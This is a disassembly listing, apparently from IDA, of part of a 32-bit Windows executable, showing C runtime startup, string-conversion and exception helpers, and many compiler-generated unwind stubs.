mov eax, ds:dword_41BCEC
mov [ebp-6Ch], eax
lea eax, [ebp-6Ch]
push eax
push ds:dword_41BCE8
lea eax, [ebp-64h]
push eax
lea eax, [ebp-70h]
push eax
lea eax, [ebp-60h]
push eax
call dword_413230 ; __getmainargs
push offset dword_41700C
push offset dword_417000
call sub_4117FA ; _initterm
add esp, 24h
mov eax, dword_413234
mov esi, [eax]
mov [ebp-74h], esi
cmp byte ptr [esi], 22h
jnz short loc_4117A0
loc_411766: ; CODE XREF: HSho:00411772�j
inc esi
mov [ebp-74h], esi
mov al, [esi]
cmp al, bl
jz short loc_411774
cmp al, 22h
jnz short loc_411766
loc_411774: ; CODE XREF: HSho:0041176E�j
cmp byte ptr [esi], 22h
jnz short loc_41177D
loc_411779: ; CODE XREF: HSho:00411785�j
inc esi
mov [ebp-74h], esi
loc_41177D: ; CODE XREF: HSho:00411777�j
; HSho:004117A3�j
mov al, [esi]
cmp al, bl
jz short loc_411787
cmp al, 20h
jbe short loc_411779
loc_411787: ; CODE XREF: HSho:00411781�j
mov [ebp-30h], ebx
lea eax, [ebp-5Ch]
push eax
call dword_413084 ; GetStartupInfoA
test byte ptr [ebp-30h], 1
jz short loc_4117AB
movzx eax, word ptr [ebp-2Ch]
jmp short loc_4117AE
; ---------------------------------------------------------------------------
loc_4117A0: ; CODE XREF: HSho:00411764�j
; HSho:004117A9�j
cmp byte ptr [esi], 20h
jbe short loc_41177D
inc esi
mov [ebp-74h], esi
jmp short loc_4117A0
; ---------------------------------------------------------------------------
loc_4117AB: ; CODE XREF: HSho:00411798�j
push 0Ah
pop eax
loc_4117AE: ; CODE XREF: HSho:0041179E�j
push eax
push esi
push ebx
push ebx
call dword_413088 ; GetModuleHandleA
push eax
call sub_4093D8
mov [ebp-68h], eax
push eax
call dword_41322C ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-78h], ecx
push eax
push ecx
call sub_4117F4 ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-78h]
call dword_413224 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4117E8 proc near ; CODE XREF: sub_41159F+3�p
jmp dword_413218
sub_4117E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4117EE proc near ; CODE XREF: sub_411646+23�p
jmp dword_41321C
sub_4117EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4117F4 proc near ; CODE XREF: HSho:004117D4�p
jmp dword_413228
sub_4117F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4117FA proc near ; CODE XREF: HSho:0041171C�p
; HSho:0041174F�p
jmp dword_413238
sub_4117FA endp
; =============== S U B R O U T I N E =======================================
sub_411800 proc near ; CODE XREF: HSho:loc_41170D�p
push 30000h
push 10000h
call sub_41181C ; _controlfp
pop ecx
pop ecx
retn
sub_411800 endp
; =============== S U B R O U T I N E =======================================
sub_411812 proc near ; DATA XREF: HSho:00411701�o
xor eax, eax
retn
sub_411812 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411816 proc near ; DATA XREF: HSho:00411694�o
jmp dword_413250
sub_411816 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41181C proc near ; CODE XREF: sub_411800+A�p
jmp dword_413258
sub_41181C endp
; =============== S U B R O U T I N E =======================================
sub_411822 proc near ; CODE XREF: sub_403488+4B�p
; sub_403488+A4�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_411A14
retn 4
sub_411822 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411830 proc near ; CODE XREF: sub_40430D+20�p
; sub_4043E6+20�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_411882
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_417BD8
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_411882
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_411882
lea eax, [ebp+var_4]
push eax
push 0
call dword_41327C
test eax, eax
jz short loc_411882
and [ebp+var_4], 0
loc_411882: ; CODE XREF: sub_411830+D�j
; sub_411830+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_411A14
leave
retn 0Ch
sub_411830 endp
; =============== S U B R O U T I N E =======================================
sub_411891 proc near ; DATA XREF: HSho:00417008�o
; FUNCTION CHUNK AT 004118AD SIZE 0000000C BYTES
call sub_41189B
jmp loc_4118AD
sub_411891 endp
; =============== S U B R O U T I N E =======================================
sub_41189B proc near ; CODE XREF: sub_411891�p
push 0Ah
push 80020004h
mov ecx, offset dword_41BCF8
call sub_4119B8
retn
sub_41189B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_411891
loc_4118AD: ; CODE XREF: sub_411891+5�j
push offset sub_4118B9
call sub_411672
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_411891
; =============== S U B R O U T I N E =======================================
sub_4118B9 proc near ; DATA XREF: sub_411891:loc_4118AD�o
push offset dword_41BCF8
call dword_413264
test eax, eax
jge short locret_4118CE
push eax
call sub_411822
locret_4118CE: ; CODE XREF: sub_4118B9+D�j
retn
sub_4118B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118CF proc near ; CODE XREF: sub_4041E3+12�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
push esi
push edi
jnz short loc_4118DE
xor eax, eax
jmp short loc_41193B
; ---------------------------------------------------------------------------
loc_4118DE: ; CODE XREF: sub_4118CF+9�j
push [ebp+arg_0]
call dword_4130BC ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4115D0
mov edi, esp
push esi
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
and word ptr [edi], 0
push 0
push 0
call dword_413068 ; MultiByteToWideChar
test eax, eax
jnz short loc_411934
mov esi, dword_413028
call esi ; RtlGetLastWin32Error
test eax, eax
jz short loc_41192C
call esi ; RtlGetLastWin32Error
and eax, 0FFFFh
or eax, 80070000h
jmp short loc_41192E
; ---------------------------------------------------------------------------
loc_41192C: ; CODE XREF: sub_4118CF+4D�j
xor eax, eax
loc_41192E: ; CODE XREF: sub_4118CF+5B�j
push eax
call sub_411822
loc_411934: ; CODE XREF: sub_4118CF+41�j
push edi
call dword_413280
loc_41193B: ; CODE XREF: sub_4118CF+D�j
lea esp, [ebp-8]
pop edi
pop esi
pop ebp
retn 4
sub_4118CF endp
; =============== S U B R O U T I N E =======================================
sub_411944 proc near ; CODE XREF: sub_404243+B�p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
xor ebx, ebx
cmp ebp, ebx
jnz short loc_411954
xor eax, eax
jmp short loc_4119B3
; ---------------------------------------------------------------------------
loc_411954: ; CODE XREF: sub_411944+A�j
push esi
push edi
push ebp
call sub_411A66 ; wcslen
lea edi, [eax+eax+2]
push edi
call sub_4114F4
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jnz short loc_411978
push 8007000Eh
call sub_411822
loc_411978: ; CODE XREF: sub_411944+28�j
push ebx
push ebx
push edi
push esi
push 0FFFFFFFFh
push ebp
push ebx
push ebx
mov [esi], bl
call dword_413064 ; WideCharToMultiByte
test eax, eax
jnz short loc_4119AF
mov edi, dword_413028
call edi ; RtlGetLastWin32Error
test eax, eax
jz short loc_4119A7
call edi ; RtlGetLastWin32Error
and eax, 0FFFFh
or eax, 80070000h
jmp short loc_4119A9
; ---------------------------------------------------------------------------
loc_4119A7: ; CODE XREF: sub_411944+53�j
xor eax, eax
loc_4119A9: ; CODE XREF: sub_411944+61�j
push eax
call sub_411822
loc_4119AF: ; CODE XREF: sub_411944+47�j
mov eax, esi
pop edi
pop esi
loc_4119B3: ; CODE XREF: sub_411944+E�j
pop ebp
pop ebx
retn 4
sub_411944 endp
; =============== S U B R O U T I N E =======================================
sub_4119B8 proc near ; CODE XREF: sub_41189B+C�p
arg_0 = dword ptr 4
arg_4 = word ptr 8
push esi
push edi
mov di, [esp+8+arg_4]
mov esi, ecx
cmp di, 3
jz short loc_4119DD
cmp di, 0Ah
jz short loc_4119E3
cmp di, 0Bh
jz short loc_4119DD
push 80070057h
call sub_411822
loc_4119DD: ; CODE XREF: sub_4119B8+D�j
; sub_4119B8+19�j
cmp di, 0Ah
jnz short loc_4119EA
loc_4119E3: ; CODE XREF: sub_4119B8+13�j
mov word ptr [esi], 0Ah
jmp short loc_411A06
; ---------------------------------------------------------------------------
loc_4119EA: ; CODE XREF: sub_4119B8+29�j
cmp di, 0Bh
jnz short loc_411A01
mov eax, [esp+8+arg_0]
mov [esi], di
neg eax
sbb eax, eax
mov [esi+8], ax
jmp short loc_411A0D
; ---------------------------------------------------------------------------
loc_411A01: ; CODE XREF: sub_4119B8+36�j
mov word ptr [esi], 3
loc_411A06: ; CODE XREF: sub_4119B8+30�j
mov eax, [esp+8+arg_0]
mov [esi+8], eax
loc_411A0D: ; CODE XREF: sub_4119B8+47�j
mov eax, esi
pop edi
pop esi
retn 8
sub_4119B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A14 proc near ; CODE XREF: sub_411822+6�p
; sub_411830+58�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4099B0
lea eax, [ebp+var_10]
push offset dword_415E10
push eax
call sub_4115BC ; _CxxThrowException
mov eax, [esp+18h+var_14]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_414AE8
jz short loc_411A5F
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_411A5F: ; CODE XREF: sub_411A14+43�j
mov eax, esi
pop esi
retn 4
sub_411A14 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411A66 proc near ; CODE XREF: sub_411944+13�p
jmp dword_4131E8
sub_411A66 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_401109 proc near ; DATA XREF: sub_401109+5�o
mov eax, offset dword_414B80
jmp sub_41156C
SEH_401109 endp
; =============== S U B R O U T I N E =======================================
sub_411A7A proc near ; DATA XREF: HSho:004011C7�o
mov eax, offset dword_414BD8
jmp sub_41156C
sub_411A7A endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-70h]
call dword_413150
retn
; ---------------------------------------------------------------------------
loc_411A8E: ; DATA XREF: HSho:00401280�o
mov eax, offset dword_414C30
jmp sub_41156C
; =============== S U B R O U T I N E =======================================
SEH_40146A proc near ; DATA XREF: sub_40146A+5�o
mov eax, offset dword_414C90
jmp sub_41156C
SEH_40146A endp
; =============== S U B R O U T I N E =======================================
sub_411AA2 proc near ; DATA XREF: HSho:004015EC�o
mov eax, offset dword_414CE8
jmp sub_41156C
sub_411AA2 endp
; =============== S U B R O U T I N E =======================================
sub_411AAC proc near ; DATA XREF: HSho:00401832�o
mov eax, offset dword_414D40
jmp sub_41156C
sub_411AAC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_401C92 proc near ; DATA XREF: sub_401C92+5�o
mov eax, offset dword_414DD0
jmp sub_41156C
SEH_401C92 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp+0Ch]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
call sub_411512
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-30h]
and eax, 1
test eax, eax
jz locret_411AFB
mov ecx, [ebp+8]
call sub_411512
locret_411AFB: ; CODE XREF: HSho:00411AED�j
retn
; ---------------------------------------------------------------------------
loc_411AFC: ; DATA XREF: HSho:00402510�o
mov eax, offset dword_414E28
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-1Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411B10: ; DATA XREF: HSho:00414E94�o
mov ecx, [ebp-1Ch]
add ecx, 4
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 8
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 10h
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 14h
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 1Ch
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 20h
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 24h
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 202Ch
jmp sub_4026C7
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411B7B: ; DATA XREF: sub_402A1E�o
mov eax, offset dword_414E68
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411B90: ; DATA XREF: HSho:00414F0C�o
mov ecx, [ebp-10h]
add ecx, 4
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 8
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 10h
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 14h
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 1Ch
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 20h
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 24h
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411BDD: ; DATA XREF: sub_402BB1�o
mov eax, offset dword_414EE0
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
loc_411BE8: ; DATA XREF: sub_402EC9�o
mov eax, offset dword_414F40
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
loc_411BF4: ; DATA XREF: HSho:00414FC4�o
lea ecx, [ebp+0Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_411C1A
mov ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
locret_411C1A: ; CODE XREF: HSho:00411C0C�j
retn
; ---------------------------------------------------------------------------
loc_411C1B: ; DATA XREF: sub_402FAF�o
mov eax, offset dword_414F98
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
loc_411C28: ; DATA XREF: HSho:00414FFC�o
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp+0Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_411C56
mov ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
locret_411C56: ; CODE XREF: HSho:00411C48�j
retn
; ---------------------------------------------------------------------------
loc_411C57: ; DATA XREF: sub_4030F7�o
mov eax, offset dword_414FD0
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_406293
; ---------------------------------------------------------------------------
loc_411C6C: ; DATA XREF: HSho:0041503C�o
lea ecx, [ebp-14h]
jmp sub_406293
; ---------------------------------------------------------------------------
lea ecx, [ebp-0C0h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0D0h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
mov ecx, [ebp-0C8h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-100h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0C4h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
mov ecx, [ebp-20h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-140h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-9Ch]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-120h]
jmp sub_4064C6
; ---------------------------------------------------------------------------
lea ecx, [ebp-54h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_406293
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_406293
; ---------------------------------------------------------------------------
lea ecx, [ebp-0A4h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0CCh]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0ACh]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0D8h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0B4h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0D4h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0BCh]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E0h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-38h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-48h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-58h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-68h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-78h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-88h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-98h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-0A8h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
loc_411D9D: ; DATA XREF: sub_403488�o
mov eax, offset dword_415010
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
push dword ptr [ebp-10h]
call sub_4114EE
pop ecx
retn
; ---------------------------------------------------------------------------
loc_411DB2: ; DATA XREF: sub_404151�o
mov eax, offset dword_415130
jmp sub_41156C
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_4114EE
pop ecx
retn
; ---------------------------------------------------------------------------
loc_411DC6: ; DATA XREF: sub_404347�o
mov eax, offset dword_415158
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
jmp sub_406293
; ---------------------------------------------------------------------------
loc_411DD8: ; DATA XREF: HSho:004151AC�o
lea ecx, [ebp-10h]
jmp sub_406293
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_4041A5
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_406293
; ---------------------------------------------------------------------------
loc_411DF0: ; DATA XREF: sub_404484�o
mov eax, offset dword_415180
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411E04: ; DATA XREF: HSho:004151EC�o
lea ecx, [ebp-38h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp+0Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-58h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-30h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp+0Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-98h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
mov ecx, [ebp+0Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-78h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
loc_411E6F: ; DATA XREF: sub_404605�o
mov eax, offset dword_4151C0
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411E84: ; DATA XREF: HSho:0041527C�o
push dword ptr [ebp-14h]
call sub_4114EE
pop ecx
retn
; ---------------------------------------------------------------------------
loc_411E8E: ; DATA XREF: sub_404AAE�o
mov eax, offset dword_415250
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411EA0: ; DATA XREF: HSho:004152AC�o
lea ecx, [ebp-28h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-0A4h]
jmp sub_4064C6
; ---------------------------------------------------------------------------
mov ecx, [ebp-20h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-84h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-58h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-0C4h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411EE9: ; DATA XREF: sub_404B40�o
mov eax, offset dword_415280
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+0Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411EFC: ; DATA XREF: HSho:00415314�o
lea ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-20h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-44h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411F44: ; DATA XREF: sub_405150�o
mov eax, offset dword_4152E8
jmp sub_41156C
; ---------------------------------------------------------------------------
align 10h
loc_411F50: ; DATA XREF: HSho:00415384�o
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_411F8E
mov ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
locret_411F8E: ; CODE XREF: HSho:00411F80�j
retn
; ---------------------------------------------------------------------------
loc_411F8F: ; DATA XREF: sub_405327�o
mov eax, offset dword_415358
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_411FA4: ; DATA XREF: HSho:004153D4�o
lea ecx, [ebp-34h]
jmp sub_4064C6
; ---------------------------------------------------------------------------
loc_411FAC: ; DATA XREF: sub_40543F�o
mov eax, offset dword_4153A8
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
loc_411FB8: ; DATA XREF: HSho:00415404�o
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_411FF6
mov ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
locret_411FF6: ; CODE XREF: HSho:00411FE8�j
retn
; ---------------------------------------------------------------------------
loc_411FF7: ; DATA XREF: sub_40558C�o
mov eax, offset dword_4153D8
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
loc_412004: ; DATA XREF: HSho:00415454�o
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_412042
mov ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
locret_412042: ; CODE XREF: HSho:00412034�j
retn
; ---------------------------------------------------------------------------
loc_412043: ; DATA XREF: sub_405693�o
mov eax, offset dword_415428
jmp sub_41156C
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_412058: ; DATA XREF: HSho:004154A4�o
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_412090: ; DATA XREF: sub_4057AB�o
mov eax, offset dword_415478
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_4120A4: ; DATA XREF: HSho:00415504�o
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_4120CC: ; DATA XREF: sub_40592B�o
mov eax, offset dword_4154D8
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
loc_4120D8: ; DATA XREF: HSho:00415554�o
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_412116
mov ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
locret_412116: ; CODE XREF: HSho:00412108�j
retn
; ---------------------------------------------------------------------------
loc_412117: ; DATA XREF: sub_405A64�o
mov eax, offset dword_415528
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_41212C: ; DATA XREF: HSho:004155A4�o
lea ecx, [ebp-1Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_41213C: ; DATA XREF: sub_405B91�o
mov eax, offset dword_415578
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_412150: ; DATA XREF: HSho:004155DC�o
lea ecx, [ebp-14h]
jmp sub_411512
